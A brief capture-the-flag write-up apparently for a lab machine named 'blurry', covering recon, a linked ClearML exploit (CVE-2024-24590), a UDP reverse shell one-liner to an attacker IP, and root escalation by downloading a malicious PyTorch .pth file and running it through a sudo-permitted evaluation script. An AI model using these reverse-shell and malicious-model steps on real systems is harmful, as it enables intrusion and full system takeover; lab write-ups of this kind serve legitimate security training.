recon
$nmap -A 10.10.11.19
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-13 09:43 UTC
Nmap scan report for 10.10.11.19
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
| 256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_ 256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel$ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://FUZZ.blurry.htb -fc 301 -t 200
files [Status: 200, Size: 2, Words: 1, Lines: 1, Duration: 83ms]
app [Status: 200, Size: 13327, Words: 382, Lines: 29, Duration: 77ms]
chat [Status: 200, Size: 218733, Words: 12692, Lines: 449, Duration: 94ms]
:: Progress: [19966/19966] :: Job [1/1] :: 179 req/sec :: Duration: [0:00:39] :: Errors: 2 ::
chata
jippity is admin.
CVE-2024-24590-ClearML
Nist database with describtion of CVE:
https://nvd.nist.gov/vuln/detail/CVE-2024-24590
Explanation:
https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/
Ready script:
https://github.com/xffsec/CVE-2024-24590-ClearML-RCE-Exploit
Now we get access to the account of jippity, admin of previous chat.
Thus, we have user flag.
Establishing shell
To escape this buggy machine:
# Listener:
nc -u -lvp 4242
# Victim:
sh -i >& /dev/udp/10.10.14.81/4242 0>&1
# and then
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL-Z
stty raw -echo; fgPriv Esc
Running LinEnum gives us:
[+] We can sudo without supplying a password!
Matching Defaults entries for jippity on blurry:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jippity may run the following commands on blurry:
(root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth
[+] We can sudo without supplying a password!
Matching Defaults entries for jippity on blurry:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jippity may run the following commands on blurry:
(root) NOPASSWD: /usr/bin/evaluate_model /models/*.pthevaluate_model is a python script running those models and based on their output it gives them a score. It becomes obvious that we need to create a malicious .pth file and run it with this script. Fortunetly for us, someone created already a script generating .pth files running arbitrary commands.
https://github.com/duck-sec/pytorch-evil-pth
# on host
./evil_pth.py 'cat /root/root.txt >> /models/flag'
http-server
# on victim
wget http://10.10.14.81:8080/evil_model.pth
sudo /usr/bin/evaluate_model /models/evil_model.pth
cat /models/flag